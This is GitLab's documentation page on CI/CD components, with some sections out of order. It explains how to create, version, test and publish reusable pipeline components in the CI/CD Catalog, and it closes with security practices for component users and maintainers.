- `$CI_SERVER_FQDN` is a [predefined variable](../variables/predefined_variables.md) for the fully qualified domain name (FQDN) matching the GitLab host. You can only reference components in the same GitLab instance as your project.
- `my-org/security-components` is the full path of the project containing the component.
- `secret-detection` is the component name that is defined as either a single file `templates/secret-detection.yml` or as a directory `templates/secret-detection/` containing a `template.yml`.
- `1.0.0` is the [version](#component-versions) of the component.

Pipeline configuration and component configuration are not processed independently. When a pipeline starts, any included component configuration [merges](../yaml/includes.md#merge-method-for-include) into the pipeline's configuration. If your pipeline and the component both contain configuration with the same name, they can interact in unexpected ways.

For example, two jobs with the same name would merge together into a single job. Similarly, a component using `extends` for configuration with the same name as a job in your pipeline could extend the wrong configuration.
Make sure your pipeline and the component do not share any configuration with the same name, unless you intend to [override](../yaml/includes.md#override-included-configuration-values) the component's configuration. To use GitLab.com components on a GitLab Self-Managed instance, you must [mirror the component project](#use-a-gitlabcom-component-on-gitlab-self-managed). {{< alert type="warning" >}} If a component requires the use of tokens, passwords, or other sensitive data to function, be sure to audit the component's source code to verify that the data is only used to perform actions that you expect and authorize. You should also use tokens and secrets with the minimum permissions, access, or scope required to complete the action. {{< /alert >}} ### Component versions In order of highest priority first, the component version can be: - A commit SHA, for example `e3262fdd0914fa823210cdb79a8c421e2cef79d8`. - A tag, for example: `1.0.0`. If a tag and commit SHA exist with the same name, the commit SHA takes precedence over the tag. Components released to the CI/CD Catalog should be tagged with a [semantic version](#semantic-versioning). - A branch name, for example `main`. If a branch and tag exist with the same name, the tag takes precedence over the branch. - `~latest`, which always points to the latest semantic version published in the CI/CD Catalog. Use `~latest` only if you want to use the absolute latest version at all times, which could include breaking changes. `~latest` does not include pre-releases, for example `1.0.1-rc`, which are not considered production-ready. You can use any version supported by the component, but using a version published to the CI/CD catalog is recommended. The version referenced with a commit SHA or branch name might not be published in the CI/CD catalog, but could be used for testing. 
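For example, reusing the illustrative component path from earlier on this page, each reference style looks like this (choose one style per include entry):

```yaml
include:
  # Pin to an exact commit SHA (highest precedence, most reproducible):
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@e3262fdd0914fa823210cdb79a8c421e2cef79d8

  # Pin to a released tag:
  # - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0

  # Track a branch (useful for testing unreleased changes):
  # - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@main

  # Always use the latest published semantic version (may include breaking changes):
  # - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@~latest
```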
#### Semantic version ranges {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/450835) in GitLab 16.11 {{< /history >}} When [referencing a CI/CD catalog component](#component-versions), you can use a special format to specify the latest [semantic version](#semantic-versioning) in a range. This approach offers significant benefits for both consumers and authors of components: - For users, using version ranges is an excellent way to automatically receive minor or patch updates without risking breaking changes from major releases. This ensures your pipelines stay up-to-date with the latest bug fixes and security patches while maintaining stability. - For component authors, the use of version ranges allows major version releases without risk of immediately breaking existing pipelines. Users who have specified version ranges continue to use the latest compatible minor or patch version, giving them time to update their pipelines at their own pace. To specify the latest release of: - A minor version, use both the major and minor version numbers in the reference, but not the patch version number. For example, use `1.1` to use the latest version that starts with `1.1`, including `1.1.0` or `1.1.9`, but not `1.2.0`. - A major version, use only the major version number in the reference. For example, use `1` to use the latest version that starts with `1.`, like `1.0.0` or `1.9.9`, but not `2.0.0`. - All versions, use `~latest` to use the latest released version. For example, a component is released in this exact order: 1. `1.0.0` 1. `1.1.0` 1. `2.0.0` 1. `1.1.1` 1. `1.2.0` 1. `2.1.0` 1. `2.0.1` In this example, referencing the component with: - `1` would use the `1.2.0` version. - `1.1` would use the `1.1.1` version. - `~latest` would use the `2.1.0` version. Pre-release versions are never fetched when referencing a version range. To fetch a pre-release version, specify the full version, for example `1.0.1-rc`. 
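For example, to automatically receive patch updates in the `1.1` series without risking a major or minor version change, reference only the major and minor numbers (sketch reusing the earlier illustrative component path):

```yaml
include:
  # Resolves to the latest 1.1.x release, such as 1.1.1 in the release sequence above.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.1
```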
## Write a component This section describes some best practices for creating high quality component projects. ### Manage dependencies While it's possible for a component to use other components in turn, make sure to carefully select the dependencies. To manage dependencies, you should: - Keep dependencies to a minimum. A small amount of duplication is usually better than having dependencies. - Rely on local dependencies whenever possible. For example, using [`include:local`](../yaml/_index.md#includelocal) is a good way to ensure the same Git SHA is used across multiple files. - When depending on components from other projects, pin their version to a release from the catalog rather than using moving target versions such as `~latest` or a Git reference. Using a release or Git SHA guarantees that you are fetching the same revision all the time and that consumers of your component get consistent behavior. - Update your dependencies regularly by pinning them to newer releases. Then publish a new release of your components with updated dependencies. - Evaluate the permissions of dependencies, and use dependencies that require the least amount of permissions. For example, if you need to build an image, consider using [Buildah](https://buildah.io/) instead of Docker, so that you don't require a Runner with a privileged Docker daemon. ### Write a clear `README.md` Each component project should have clear and comprehensive documentation. To write a good `README.md` file: - The documentation should start with a summary of the capabilities that the components in the project provide. - If the project contains multiple components, use a [table of contents](../../user/markdown.md#table-of-contents) to help users quickly jump to a specific component's details. - Add a `## Components` section with sub-sections like `### Component A` for each component in the project. - In each component section: - Add a description of what the component does. 
- Add at least one YAML example showing how to use it. - If the component uses inputs, add a table showing all inputs with name, description, type, and default value. - If the component uses any variables or secrets, those should be documented too. - A `## Contribute` section is recommended if contributions are welcome. If a component needs more instructions, add additional documentation in a Markdown file in the component directory and link to it from the main `README.md` file. For example: ```plaintext README.md # with links to the specific docs.md templates/ ├── component-1/ │ ├── template.yml │ └── docs.md └── component-2/ ├── template.yml └── docs.md ``` For an example of a component `README.md`, see the [Deploy to AWS with GitLab CI/CD component's `README.md`](https://gitlab.com/components/aws/-/blob/main/README.md). ### Test the component Testing CI/CD components as part of the development workflow is strongly recommended and helps ensure consistent behavior. Test changes in a CI/CD pipeline (like any other project) by creating a `.gitlab-ci.yml` in the root directory. Make sure to test both the behavior and potential side-effects of the component. You can use the [GitLab API](../../api/rest/_index.md) if needed. For example: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/my-component@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] # Check if `component job of my-component` is added. # This example job could also test that the included component works as expected. # You can inspect data generated by the component, use GitLab API endpoints, or third-party tools. ensure-job-added: stage: test image: badouralix/curl-jq # Replace "component job of my-component" with the job name in your component. 
script: - | route="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/pipelines/${CI_PIPELINE_ID}/jobs" count=`curl --silent "$route" | jq 'map(select(.name | contains("component job of my-component"))) | length'` if [ "$count" != "1" ]; then exit 1; else echo "Component Job present" fi # If the pipeline is for a new tag with a semantic version, and all previous jobs succeed, # create the release. create-release: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components repository $CI_PROJECT_PATH" ``` After committing and pushing changes, the pipeline tests the component, then creates a release if the earlier jobs pass. {{< alert type="note" >}} Authentication is necessary if the project is private. {{< /alert >}} #### Test a component against sample files In some cases, components require source files to interact with. For example, a component that builds Go source code likely needs some samples of Go to test against. Alternatively, a component that builds Docker images likely needs some sample Dockerfiles to test against. You can include sample files like these directly in the component project, to be used during component testing. You can learn more in [examples for testing a component](examples.md#test-a-component). ### Avoid hard-coding instance or project-specific values When [using another component](#use-a-component) in your component, use `$CI_SERVER_FQDN` instead of your instance's Fully Qualified Domain Name (like `gitlab.com`). When accessing the GitLab API in your component, use the `$CI_API_V4_URL` instead of the full URL and path for your instance (like `https://gitlab.com/api/v4`). 
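For example, a component job that queries the API could look like this (a hypothetical sketch; the job name is illustrative):

```yaml
check-pipeline-status:
  stage: test
  image: badouralix/curl-jq
  script:
    # $CI_API_V4_URL resolves to the API root of whichever instance runs the pipeline,
    # so the component is not tied to https://gitlab.com/api/v4
    - curl --silent "$CI_API_V4_URL/projects/$CI_PROJECT_ID/pipelines/$CI_PIPELINE_ID" | jq .status
```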
These [predefined variables](../variables/predefined_variables.md) ensure that your component also works when used on another instance,
for example when using [a GitLab.com component on a GitLab Self-Managed instance](#use-a-gitlabcom-component-on-gitlab-self-managed).

### Do not assume API resources are always public

Ensure that the component and its testing pipeline also work [on GitLab Self-Managed](#use-a-gitlabcom-component-on-gitlab-self-managed).
While some API resources of public projects can be accessed with unauthenticated requests on GitLab.com,
on a GitLab Self-Managed instance the component project could be mirrored as a private or internal project.
Make sure that users can optionally provide an access token through inputs or variables
to authenticate requests on GitLab Self-Managed instances.

### Avoid using global keywords

Avoid using [global keywords](../yaml/_index.md#global-keywords) in a component.
Using these keywords in a component affects all jobs in a pipeline,
including jobs directly defined in the main `.gitlab-ci.yml` or in other included components.

As an alternative to global keywords:

- Add the configuration directly to each job, even if it creates some duplication in the component configuration.
- Use the [`extends`](../yaml/_index.md#extends) keyword in the component, but use unique names
  that reduce the risk of naming conflicts when the component is merged into the configuration.
For example, avoid using the `default` global keyword: ```yaml # Not recommended default: image: ruby:3.0 rspec-1: script: bundle exec rspec dir1/ rspec-2: script: bundle exec rspec dir2/ ``` Instead, you can: - Add the configuration to each job explicitly: ```yaml rspec-1: image: ruby:3.0 script: bundle exec rspec dir1/ rspec-2: image: ruby:3.0 script: bundle exec rspec dir2/ ``` - Use `extends` to reuse configuration: ```yaml .rspec-image: image: ruby:3.0 rspec-1: extends: - .rspec-image script: bundle exec rspec dir1/ rspec-2: extends: - .rspec-image script: bundle exec rspec dir2/ ``` ### Replace hardcoded values with inputs Avoid using hardcoded values in CI/CD components. Hardcoded values might force component users to need to review the component's internal details and adapt their pipeline to work with the component. A common keyword with problematic hard-coded values is `stage`. If a component job's stage is hardcoded, all pipelines using the component **must** either define the exact same stage, or [override](../yaml/includes.md#override-included-configuration-values) the configuration. The preferred method is to use the [`input` keyword](../inputs/_index.md) for dynamic component configuration. The component user can specify the exact value they need. For example, to create a component with `stage` configuration that can be defined by users: - In the component configuration: ```yaml spec: inputs: stage: default: test --- unit-test: stage: $[[ inputs.stage ]] script: echo unit tests integration-test: stage: $[[ inputs.stage ]] script: echo integration tests ``` - In a project using the component: ```yaml stages: [verify, release] include: - component: $CI_SERVER_FQDN/myorg/ruby/test@1.0.0 inputs: stage: verify ``` #### Define job names with inputs Similar to the values for the `stage` keyword, you should avoid hard-coding job names in CI/CD components. 
When your component's users can customize job names, they can prevent conflicts with the existing names in their pipelines. Users could also include a component multiple times with different input options by using different names. Use `inputs` to allow your component's users to define a specific job name, or a prefix for the job name. For example: ```yaml spec: inputs: job-prefix: description: "Define a prefix for the job name" job-name: description: "Alternatively, define the job's name" job-stage: default: test --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - scan-website-1 "$[[ inputs.job-name ]]": stage: $[[ inputs.job-stage ]] script: - scan-website-2 ``` ### Replace custom CI/CD variables with inputs When using CI/CD variables in a component, evaluate if the `inputs` keyword should be used instead. Avoid asking users to define custom variables to configure components when `inputs` is a better solution. Inputs are explicitly defined in the component's `spec` section, and have better validation than variables. For example, if a required input is not passed to the component, GitLab returns a pipeline error. By contrast, if a variable is not defined, its value is empty, and there is no error. For example, use `inputs` instead of variables to configure a scanner's output format: - In the component configuration: ```yaml spec: inputs: scanner-output: default: json --- my-scanner: script: my-scan --output $[[ inputs.scanner-output ]] ``` - In the project using the component: ```yaml include: - component: $CI_SERVER_FQDN/path/to/project/my-scanner@1.0.0 inputs: scanner-output: yaml ``` In other cases, CI/CD variables might still be preferred. For example: - Use [predefined variables](../variables/predefined_variables.md) to automatically configure a component to match a user's project. 
- Ask users to store sensitive values as [masked or protected CI/CD variables in project settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). ## CI/CD Catalog {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407249) as an [experiment](../../policy/development_stages_support.md#experiment) in GitLab 16.1. - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/432045) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.7. - [Made Generally Available](https://gitlab.com/gitlab-org/gitlab/-/issues/454306) in GitLab 17.0. {{< /history >}} The [CI/CD Catalog](https://gitlab.com/explore/catalog) is a list of projects with published CI/CD components you can use to extend your CI/CD workflow. Anyone can [create a component project](#create-a-component-project) and add it to the CI/CD Catalog, or contribute to an existing project to improve the available components. For a click-through demo, see [the CI/CD Catalog beta Product Tour](https://gitlab.navattic.com/cicd-catalog). <!-- Demo published on 2024-01-24 --> ### View the CI/CD Catalog To access the CI/CD Catalog and view the published components that are available to you: 1. On the left sidebar, select **Search or go to**. 1. Select **Explore**. 1. Select **CI/CD Catalog**. Alternatively, if you are already in the [pipeline editor](../pipeline_editor/_index.md) in your project, you can select **CI/CD Catalog**. Visibility of components in the CI/CD catalog follows the component source project's [visibility setting](../../user/public_access.md). Components with source projects set to: - Private are visible only to users assigned at least the Guest role for the source component project. To use a component, you must have at least the Reporter role. - Internal are visible only to users logged into the GitLab instance. 
- Public are visible to anyone with access to the GitLab instance. ### Publish a component project To publish a component project in the CI/CD catalog, you must: 1. Set the project as a catalog project. 1. Publish a new release. #### Set a component project as a catalog project To make published versions of a component project visible in the CI/CD catalog, you must set the project as a catalog project. Prerequisites: - You must have the Owner role for the project. To set the project as a catalog project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **CI/CD Catalog project** toggle. The project only becomes findable in the catalog after you publish a new release. To use automation to enable this setting, you can use the [`mutationcatalogresourcescreate`](../../api/graphql/reference/_index.md#mutationcatalogresourcescreate) GraphQL endpoint. [Issue 463043](https://gitlab.com/gitlab-org/gitlab/-/issues/463043) proposes to expose this in the REST API as well. #### Publish a new release CI/CD components can be [used](#use-a-component) without being listed in the CI/CD catalog. However, publishing a component's releases in the catalog makes it discoverable to other users. Prerequisites: - You must have at least the Maintainer role for the project. - The project must: - Be set as a [catalog project](#set-a-component-project-as-a-catalog-project). - Have a [project description](../../user/project/working_with_projects.md#edit-a-project) defined. - Have a `README.md` file in the root directory for the commit SHA of the tag being released. - Have at least one [CI/CD component in the `templates/` directory](#directory-structure) for the commit SHA of the tag being released. 
- You must use the [`release` keyword](../yaml/_index.md#release) in a CI/CD job to create the release,
  not the [Releases API](../../api/releases/_index.md#create-a-release).

To publish a new version of the component to the catalog:

1. Add a job to the project's `.gitlab-ci.yml` file that uses the `release` keyword to create the new release
   when a tag is created. You should configure the tag pipeline to [test the components](#test-the-component)
   before running the release job. For example:

   ```yaml
   create-release:
     stage: release
     image: registry.gitlab.com/gitlab-org/release-cli:latest
     script: echo "Creating release $CI_COMMIT_TAG"
     rules:
       - if: $CI_COMMIT_TAG
     release:
       tag_name: $CI_COMMIT_TAG
       description: "Release $CI_COMMIT_TAG of components in $CI_PROJECT_PATH"
   ```

1. Create a [new tag](../../user/project/repository/tags/_index.md#create-a-tag) for the release,
   which should trigger a tag pipeline that contains the job responsible for creating the release.
   The tag must use [semantic versioning](#semantic-versioning).

After the release job completes successfully, the release is created and the new version
is published to the CI/CD catalog.

#### Semantic versioning

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/427286) in GitLab 16.10.

{{< /history >}}

When tagging and [releasing new versions](#publish-a-new-release) of components to the Catalog,
you must use [semantic versioning](https://semver.org). Semantic versioning is the standard
for communicating that a change is a major, minor, patch, or other kind of change.

For example, `1.0.0`, `2.3.4`, and `1.0.0-alpha` are all valid semantic versions.

### Unpublish a component project

To remove a component project from the catalog, turn off the [**CI/CD Catalog project**](#set-a-component-project-as-a-catalog-project)
toggle in the project settings.

{{< alert type="warning" >}}

This action destroys the metadata about the component project and its versions published in the catalog.
The project and its repository still exist, but are not visible in the catalog. {{< /alert >}} To publish the component project in the catalog again, you need to [publish a new release](#publish-a-new-release). ### Verified component creators {{< history >}} - [Introduced for GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/issues/433443) in GitLab 16.11 - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} Some CI/CD components are badged with an icon to show that the component was created and is maintained by users verified by GitLab or the instance administrator: - GitLab-maintained ({{< icon name="tanuki-verified" >}}): GitLab.com components that are created and maintained by GitLab. - GitLab Partner ({{< icon name="partner-verified" >}}): GitLab.com components that are independently created and maintained by a GitLab-verified partner. GitLab partners can contact a member of the GitLab Partner Alliance to have their namespace on GitLab.com flagged as GitLab-verified. Then any CI/CD components located in the namespace are badged as GitLab Partner components. The Partner Alliance member creates an [internal request issue (GitLab team members only)](https://gitlab.com/gitlab-com/support/internal-requests/-/issues/new?issuable_template=CI%20Catalog%20Badge%20Request) on behalf of the verified partner. {{< alert type="warning" >}} GitLab Partner-created components are provided **as-is**, without warranty of any kind. An end user's use of a GitLab Partner-created component is at their own risk and GitLab shall have no indemnification obligations nor any liability of any type with respect to the end user's use of the component. The end user's use of such content and any liability related thereto shall be between the publisher of the content and the end user. 
{{< /alert >}} - Verified creator ({{< icon name="check-sm" >}}): Components created and maintained by a user verified by an administrator. #### Set a component as maintained by a verified creator {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} A GitLab administrator can set a CI/CD component as created and maintained by a verified creator: 1. Open GraphiQL in the instance with your administrator account, for example at: `https://gitlab.example.com/-/graphql-explorer`. 1. Run this query, replacing `root-level-group` with the root namespace of the component to verify: ```graphql mutation { verifiedNamespaceCreate(input: { namespacePath: "root-level-group", verificationLevel: VERIFIED_CREATOR_SELF_MANAGED }) { errors } } ``` After the query completes, all components in projects in the root namespace are verified. The **Verified creator** badge displays next to the component names in the CI/CD catalog. To remove the badge from a component, repeat the query with `UNVERIFIED` for `verificationLevel`. ## Convert a CI/CD template to a component Any existing CI/CD template that you use in projects by using the `include:` syntax can be converted to a CI/CD component: 1. Decide if you want the component to be grouped with other components as part of an existing [component project](#component-project), or [create a new component project](#create-a-component-project). 1. Create a YAML file in the component project according to the [directory structure](#directory-structure). 1. Copy the content of the original template YAML file into the new component YAML file. 1. Refactor the new component's configuration to: - Follow the guidance on [writing a component](#write-a-component). 
- Improve the configuration, for example by enabling [merge request pipelines](../pipelines/merge_request_pipelines.md) or making it [more efficient](../pipelines/pipeline_efficiency.md). 1. Leverage the `.gitlab-ci.yml` in the components repository to [test changes to the component](#test-the-component). 1. Tag and [release the component](#publish-a-new-release). You can learn more by following a practical example for [migrating the Go CI/CD template to CI/CD component](examples.md#cicd-component-migration-example-go). ## Use a GitLab.com component on GitLab Self-Managed {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} The CI/CD catalog of a fresh install of a GitLab instance starts with no published CI/CD components. To populate your instance's catalog, you can: - [Publish your own components](#publish-a-component-project). - Mirror components from GitLab.com in your GitLab Self-Managed instance. To mirror a GitLab.com component in your GitLab Self-Managed instance: 1. Make sure that [network outbound requests](../../security/webhooks.md) are allowed for `gitlab.com`. 1. [Create a group](../../user/group/_index.md#create-a-group) to host the component projects (recommended group: `components`). 1. [Create a mirror of the component project](../../user/project/repository/mirror/pull.md) in the new group. 1. Write a [project description](../../user/project/working_with_projects.md#edit-a-project) for the component project mirror because mirroring repositories does not copy the description. 1. [Set the self-hosted component project as a catalog resource](#set-a-component-project-as-a-catalog-project). 1. Publish [a new release](../../user/project/releases/_index.md) in the self-hosted component project by [running a pipeline](../pipelines/_index.md#run-a-pipeline-manually) for a tag (usually the latest tag). 
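Projects on your instance can then include the mirrored component using your own instance's FQDN. For example, if the mirror lives in a `components` group as recommended above (project and component names are illustrative):

```yaml
include:
  # $CI_SERVER_FQDN resolves to your GitLab Self-Managed instance, not gitlab.com.
  - component: $CI_SERVER_FQDN/components/secret-detection/secret-detection@1.0.0
```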
## CI/CD component security best practices ### For component users As anyone can publish components to the catalog, you should carefully review components before using them in your project. Use of GitLab CI/CD components is at your own risk and GitLab cannot guarantee the security of third-party components. When using third-party CI/CD components, consider the following security best practices: - **Audit and review component source code**: Carefully examine the code to ensure it's free of malicious content. - **Minimize access to credentials and tokens**: - Audit the component's source code to verify that any credentials or tokens are only used to perform actions that you expect and authorize. - Use minimally scoped access tokens. - Avoid using long-lived access tokens or credentials. - Audit use of credentials and tokens used by CI/CD components. - **Use pinned versions**: Pin CI/CD components to a specific commit SHA (preferred) or release version tag to ensure the integrity of the component used in a pipeline. Only use release tags if you trust the component maintainer. Avoid using `latest`. - **Store secrets securely**: Do not store secrets in CI/CD configuration files. Avoid storing secrets and credentials in project settings if you can use an external secret management solution instead. - **Use ephemeral, isolated runner environments**: Run component jobs in temporary, isolated environments when possible. Be aware of [security risks](https://docs.gitlab.com/runner/security) with self-managed runners. - **Securely handle cache and artifacts**: Do not pass cache or artifacts from other jobs in your pipeline to CI/CD component jobs unless absolutely necessary. - **Limit CI_JOB_TOKEN access**: Restrict [CI/CD job token (`CI_JOB_TOKEN`) project access and permissions](../jobs/ci_job_token.md#control-job-token-access-to-your-project) for projects using CI/CD components. 
- **Review CI/CD component changes**: Carefully review all changes to the CI/CD component configuration
  before changing to use an updated commit SHA or release tag for the component.
- **Audit custom container images**: Carefully review any custom container images used by the CI/CD component
  to ensure they are free of malicious content.

### For component maintainers

To maintain secure and trustworthy CI/CD components and ensure the integrity of the pipeline configuration
you deliver to users, follow these best practices:

- **Use two-factor authentication (2FA)**: Ensure all CI/CD component project maintainers and owners have
  [2FA enabled](../../user/profile/account/two_factor_authentication.md#enable-two-factor-authentication),
  or enforce [2FA for all users in the group](../../security/two_factor_authentication.md#enforce-2fa-for-all-users-in-a-group).
- **Use protected branches**:
  - Use [protected branches](../../user/project/repository/branches/protected.md) for component project releases.
  - Protect the default branch, and protect all release branches [using wildcard rules](../../user/project/repository/branches/protected.md#use-wildcard-rules).
  - Require everyone to submit merge requests for changes to protected branches.
    Set the **Allowed to push and merge** option to `No one` for protected branches.
  - Block force pushes to protected branches.
- **Sign all commits**: [Sign all commits](../../user/project/repository/signed_commits/_index.md) to the component project.
- **Discourage using `latest`**: Avoid including examples in your `README.md` that use `@latest`.
- **Limit dependency on caches and artifacts from other jobs**: Only use cache and artifacts from other jobs
  in CI/CD components if absolutely necessary.
- **Update CI/CD component dependencies**: Check for and apply updates to dependencies regularly.
- **Review changes carefully**:
  - Carefully review all changes to the CI/CD component pipeline configuration before merging into default or release branches.
- Use [merge request approvals](../../user/project/merge_requests/approvals/_index.md) for all user-facing changes to CI/CD component catalog projects. ## Troubleshooting ### `content not found` message You might receive an error message similar to the following when using the `~latest` version qualifier to reference a component hosted by a [catalog project](#set-a-component-project-as-a-catalog-project): ```plaintext This GitLab CI configuration is invalid: Component 'gitlab.com/my-namespace/my-project/my-component@~latest' - content not found ``` The `~latest` behavior [was updated](https://gitlab.com/gitlab-org/gitlab/-/issues/442238) in GitLab 16.10. It now refers to the latest semantic version of the catalog resource. To resolve this issue, [create a new release](#publish-a-new-release). ### Error: `Build component error: Spec must be a valid json schema` If a component has invalid formatting, you might not be able to create a release and could receive an error like `Build component error: Spec must be a valid json schema`. This error can be caused by an empty `spec:inputs` section. If your configuration does not use any inputs, you can make the `spec` section empty instead. For example: ```yaml spec: --- my-component: script: echo ```
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD components description: Reusable, versioned CI/CD components for pipelines. breadcrumbs: - doc - ci - components --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Introduced as an [experimental feature](../../policy/development_stages_support.md#experiment) in GitLab 16.0, [with a flag](../../administration/feature_flags/_index.md) named `ci_namespace_catalog_experimental`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/groups/gitlab-org/-/epics/9897) in GitLab 16.2. - [Feature flag `ci_namespace_catalog_experimental` removed](https://gitlab.com/gitlab-org/gitlab/-/issues/394772) in GitLab 16.3. - [Moved](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/130824) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.6. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} A CI/CD component is a reusable single pipeline configuration unit. Use components to create a small part of a larger pipeline, or even to compose a complete pipeline configuration. A component can be configured with [input parameters](../inputs/_index.md) for more dynamic behavior. CI/CD components are similar to the other kinds of [configuration added with the `include` keyword](../yaml/includes.md), but have several advantages: - Components can be listed in the [CI/CD Catalog](#cicd-catalog). - Components can be released and used with a specific version. - Multiple components can be defined in the same project and versioned together. 
Instead of creating your own components, you can also search for published components that have the functionality you need in the [CI/CD Catalog](#cicd-catalog). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an introduction and hands-on examples, see [Efficient DevSecOps workflows with reusable CI/CD components](https://www.youtube.com/watch?v=-yvfSFKAgbA). <!-- Video published on 2024-01-22. DRI: Developer Relations, https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/399 --> For common questions and additional support, see the [FAQ: GitLab CI/CD Catalog](https://about.gitlab.com/blog/2024/08/01/faq-gitlab-ci-cd-catalog/) blog post. ## Component project {{< history >}} - The maximum number of components per project [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/436565) from 10 to 30 in GitLab 16.9. {{< /history >}} A component project is a GitLab project with a repository that hosts one or more components. All components in the project are versioned together, with a maximum of 30 components per project. If a component requires different versioning from other components, the component should be moved to a dedicated component project. ### Create a component project To create a component project, you must: 1. [Create a new project](../../user/project/_index.md#create-a-blank-project) with a `README.md` file: - Ensure the description gives a clear introduction to the component. - Optional. After the project is created, you can [add a project avatar](../../user/project/working_with_projects.md#add-a-project-avatar). Components published to the [CI/CD catalog](#cicd-catalog) use both the description and avatar when displaying the component project's summary. 1. Add a YAML configuration file for each component, following the [required directory structure](#directory-structure). 
For example: ```yaml spec: inputs: stage: default: test --- component-job: script: echo job 1 stage: $[[ inputs.stage ]] ``` You can [use the component](#use-a-component) immediately, but you might want to consider publishing the component to the [CI/CD catalog](#cicd-catalog). ### Directory structure The repository must contain: - A `README.md` Markdown file documenting the details of all the components in the repository. - A top level `templates/` directory that contains all the component configurations. In this directory: - For simple components, use single files ending in `.yml` for each component, like `templates/secret-detection.yml`. - For complex components, create subdirectories with a `template.yml` for each component, like `templates/secret-detection/template.yml`. Only the `template.yml` file is used by other projects using the component. Other files in these directories are not released with the component, but can be used for things like tests or building container images. {{< alert type="note" >}} Optionally, each component can also have its own `README.md` file that provides more detailed information, and can be linked from the top-level `README.md` file. This helps to provide a better overview of your component project and how to use it. {{< /alert >}} You should also: - Configure the project's `.gitlab-ci.yml` to [test the components](#test-the-component) and [release new versions](#publish-a-new-release). - Add a `LICENSE.md` file with a license of your choice that covers the usage of your component. For example the [MIT](https://opensource.org/license/mit) or [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0#apply) open source licenses. 
For example: - If the project contains a single component, the directory structure should be similar to: ```plaintext ├── templates/ │ └── my-component.yml ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` - If the project contains multiple components, then the directory structure should be similar to: ```plaintext ├── templates/ │ ├── my-simple-component.yml │ └── my-complex-component/ │ ├── template.yml │ ├── Dockerfile │ └── test.sh ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` In this example: - The `my-simple-component` component's configuration is defined in a single file. - The `my-complex-component` component's configuration contains multiple files in a directory. ## Use a component Prerequisites: If you are a member of a parent group that contains the current group or project: - You must have the minimum role set by the visibility level of the project's parent group. For example, you must have at least the Reporter role if a parent project is set to **Private**. To add a component to a project's CI/CD configuration, use the [`include: component`](../yaml/_index.md#includecomponent) keyword. The component reference is formatted as `<fully-qualified-domain-name>/<project-path>/<component-name>@<specific-version>`, for example: ```yaml include: - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0 inputs: stage: build ``` In this example: - `$CI_SERVER_FQDN` is a [predefined variable](../variables/predefined_variables.md) for the fully qualified domain name (FQDN) matching the GitLab host. You can only reference components in the same GitLab instance as your project. - `my-org/security-components` is the full path of the project containing the component. - `secret-detection` is the component name that is defined as either a single file `templates/secret-detection.yml` or as a directory `templates/secret-detection/` containing a `template.yml`. - `1.0.0` is the [version](#component-versions) of the component. 
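A pipeline can include more than one component. The project paths, component names, and versions in this sketch are illustrative:

```yaml
include:
  # Two components from different component projects, each pinned to a release.
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0
  - component: $CI_SERVER_FQDN/my-org/build-components/docker-build@2.1.0
    inputs:
      stage: build
```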
